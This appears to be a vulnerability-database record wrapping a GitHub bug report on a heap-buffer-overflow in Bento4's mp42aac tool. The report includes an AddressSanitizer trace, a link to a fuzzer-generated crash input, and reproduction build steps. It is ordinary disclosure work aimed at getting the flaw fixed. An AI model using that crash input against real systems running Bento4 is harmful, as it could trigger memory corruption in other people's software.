[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/17ssDP/fuzzer_crashes/blob/main/Bento4/mp42aac-hbo-01" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/789" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.212007" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/789
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, developers of Bento4: Thanks for your fix of issue #751 In the test of the binary mp42aac instrumented with ASAN. There are some inputs causing heap-buffer-overflow. Here is the ASAN mode output. This issue may be because of an incomplete fix of #751. ================================================================= ==8242==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000002798 at pc 0x7f30ba3a2964 bp 0x7fff5a52d110 sp 0x7fff5a52c8b8 WRITE of size 4294967288 at 0x619000002798 thread T0 #0 0x7f30ba3a2963 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c963) #1 0x409c09 in AP4_MemoryByteStream::WritePartial(void const*, unsigned int, unsigned int&) /root/Bento4/Source/C++/Core/Ap4ByteStream.cpp:785 #2 0x40da09 in AP4_ByteStream::Write(void const*, unsigned int) /root/Bento4/Source/C++/Core/Ap4ByteStream.cpp:77 #3 0x65a86f in AP4_SgpdAtom::WriteFields(AP4_ByteStream&) /root/Bento4/Source/C++/Core/Ap4SgpdAtom.cpp:144 #4 0x4e99bc in AP4_Atom::Write(AP4_ByteStream&) /root/Bento4/Source/C++/Core/Ap4Atom.cpp:229 #5 0x4e99bc in AP4_Atom::Clone() /root/Bento4/Source/C++/Core/Ap4Atom.cpp:316 #6 0x574024 in AP4_ContainerAtom::Clone() /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:172 #7 0x574024 in AP4_ContainerAtom::Clone() /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:172 #8 0x446e72 in AP4_SampleDescription::AP4_SampleDescription(AP4_SampleDescription::Type, unsigned int, AP4_AtomParent*) /root/Bento4/Source/C++/Core/Ap4SampleDescription.cpp:138 #9 0x460bf8 in AP4_GenericAudioSampleDescription::AP4_GenericAudioSampleDescription(unsigned int, unsigned int, unsigned short, unsigned short, AP4_AtomParent*) /root/Bento4/Source/C++/Core/Ap4SampleDescription.h:259 #10 0x460bf8 in AP4_AudioSampleEntry::ToSampleDescription() /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:630 #11 0x4899a4 in AP4_StsdAtom::GetSampleDescription(unsigned int) /root/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:181 #12 0x404135 in main /root/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:268 #13 0x7f30b966783f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #14 0x408128 in _start (/root/Bento4/mp42aac+0x408128) 0x619000002798 is located 0 bytes to the right of 1048-byte region [0x619000002380,0x619000002798) allocated by thread T0 here: #0 0x7f30ba3af712 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99712) #1 0x4151ce in AP4_DataBuffer::ReallocateBuffer(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x4151ce in AP4_DataBuffer::SetBufferSize(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:136 #3 0x4151ce in AP4_DataBuffer::Reserve(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:107 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy Shadow bytes around the buggy address: 0x0c327fff84a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff84b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff84c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff84d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff84e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fff84f0: 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8530: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==8242==ABORTING ### Crash input https://github.com/17ssDP/fuzzer_crashes/blob/main/Bento4/mp42aac-hbo-01 ### Validation steps git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j ./mp42aac mp42aac-hbo-01 /dev/null ### Environment Ubuntu 16.04 Clang 10.0.1 gcc 5.5
Heap-buffer-overflow with ASAN in mp42aac
https://api.github.com/repos/axiomatic-systems/Bento4/issues/789/comments
0
2022-10-04T06:45:46Z
2023-05-29T02:51:19Z
https://github.com/axiomatic-systems/Bento4/issues/789
1,395,747,445
789